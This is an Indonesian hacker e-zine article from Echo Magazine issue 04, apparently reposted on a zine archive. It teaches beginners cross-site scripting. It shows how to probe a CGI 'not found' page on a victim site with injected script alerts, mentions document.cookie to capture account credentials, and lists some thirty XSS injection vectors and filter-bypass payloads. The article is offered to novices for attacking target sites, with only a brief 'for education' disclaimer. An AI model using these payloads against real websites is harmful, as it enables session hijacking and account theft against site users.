Copy Link
Add to Bookmark
Report

Echo Magazine Issue 04 Phile 0x003

eZine's profile picture
Published in 
Echo Magazine
 · 4 years ago

  

____________________ ___ ___ ________
\_ _____/\_ ___ \ / | \\_____ \
| __)_ / \ \// ~ \/ | \
| \\ \___\ Y / | \
/_______ / \______ /\___|_ /\_______ /
\/ \/ \/ \/


.OR.ID
ECHO-ZINE RELEASE
04

Author: the_day (Echo staff) the_day@echo.or.id |
Online @ www.echo.or.id :: http://ezine.echo.or.id

== XSS <CROSS SITE SCRIPTING> ==


BEGIN
*PENGANTAR : Karena banyak permintaan di forum untuk menulis tentang XSS
maka aku coba tulis tentang ezine tentang xss ini . XSS adalah suatu
cara memasukan code/script HTML kedalam suatu web site dan dijalankan
melalui browser di client . XSS merupakan pilihan yang menarik bagi
para newbie yang tidak mempunyai shell dan sploit ,karena untuk melakukan
xss hanya di butuhkan sebuah browser. Ingat XSS adalah hanya memasukan
script kedalam url site target . Ada perbedaan antara XSS dengan
Script injetion . Xss hasilnya hanya bisa diliat secara temporary beda
dengan script injection yang full merubahnya sama seperti kita mendapatkan
root dan merubah halaman index nya.
*Script yang bisa digunakan untuk XSS adalah
-> HTML
-> JavaScript
-> VBScript
-> Active X
-> Flash
Disini aku akan coba menjelaskan yang mengunakan code Javascript.
Langsung aja ke permasalahanya , disini selain menggunakan Javascript
aku juga menggunakan file yang ada di cgi *.cgi untuk di xss ,karena
banyak dari file2 cgi yang bisa di xss.
Pernah mungkin dari kalian membuka suatu web dan ada bacaan
" 404 - data.php Not Found " dari sini kita tau bahwa ada file dari cgi
yang menggunakannya untuk response apabila tidak ada file di dalam server
nya.
untuk contoh jelasnya alamat web yang aktif
www.victim.com/cgi-bin/program.cgi?page=downloads.html
bagaimana kalau kita ganti alamat diatas menjadi
www.victim.com/cgi-bin/program.cgi?page=tes.html
Maka akan tampil :404 - tes.html Not Found!
Lalau apa yang kita bisa perbuat dengan itu , jawabnya simple aja
kita tes apakah web itu bisa di xss.
Caranya :
www.victim.com/cgi-bin/program.cgi?page=<script>alert('tes XSS')</script>
kalau muncul kotak popup alert itu maka web tersebut bisa di xss,
gampang kan.
Kuncinya untuk memastikan apakah suatu web vuln terhadap xss , masukan
script <script>alert('tes')</script> didalam semua form yg ada di web tsb.
Selain script itu juga xss bisa digunakan untuk mengetahui password account
dengan cara <script>alert(document.cookie)</script>.
Ingat xss ini bisa secara permanen atau temporary aja.
selain script itu ada banyak script yg biasa digunakan :

<a href="javascript#[code]">
<div onmouseover="[code]">
<img src="javascript:[code]">
<img dynsrc="javascript:[code]"> [IE]
<input type="image" dynsrc="javascript:[code]"> [IE]
<bgsound src="javascript:[code]"> [IE]
&<script>[code]</script>
&{[code]}; [N4]
<img src=&{[code]};> [N4]
<link rel="stylesheet" href="javascript:[code]">
<iframe src="vbscript:[code]"> [IE]
<img src="mocha:[code]"> [N4]
<img src="livescript:[code]"> [N4]
<a href="about:<script>[code]</script>">
<meta http-equiv="refresh" content="0;url=javascript:[code]">
<body onload="[code]">
<div style="background-image: url(javascript:[code]);">
<div style="behaviour: url([link to code]);"> [IE]
<div style="binding: url([link to code]);"> [Mozilla]
<div style="width: expression([code]);"> [IE]
<style type="text/javascript">[code]</style> [N4]
<object classid="clsid:..." codebase="javascript:[code]"> [IE]
<style><!--</style><script>[code]//--></script>
<![CDATA[<!--]]><script>[code]//--></script>
<!-- -- --><script>[code]</script><!-- -- -->
<script>[code]</script>
<img src="blah"onmouseover="[code]">
<img src="blah>" onmouseover="[code]">
<xml src="javascript:[code]">
<xml id="X"><a><b><script>[code]</script>;</b></a></xml>
<div datafld="b" dataformatas="html" datasrc="#X"></div>
[\xC0][\xBC]script>[code][\xC0][\xBC]/script> [UTF-8; IE, Opera]

Mungkin hanya ini aja yang bisa aku buat ,semoga artikel ini bermanfaat.
Tulisan ini hanya untuk pendidikan dan pengetahuan aja , jadi semua
kembali ke diri masing2.

EOF
[the_day]


*greetz to:
[echostaff a.k.a y3dips, moby, comex ,z3r0byt3] && sarah[MY LOVELY],
pak onno, pak linus, pak eric s. Raymond, pak RM. stallman,
anak2 newbie_hacker,$the community,$peci@l temen2 seperjuangan

kritik && saran kirimkan ke the_day [at]echo.or.id


← previous
next →
loading
sending ...
New to Neperos ? Sign Up for free
download Neperos App from Google Play
install Neperos as PWA

Let's discover also

Recent Articles

Recent Comments

Neperos cookies
This website uses cookies to store your preferences and improve the service. Cookies authorization will allow me and / or my partners to process personal data such as browsing behaviour.

By pressing OK you agree to the Terms of Service and acknowledge the Privacy Policy

By pressing REJECT you will be able to continue to use Neperos (like read articles or write comments) but some important cookies will not be set. This may affect certain features and functions of the platform.
OK
REJECT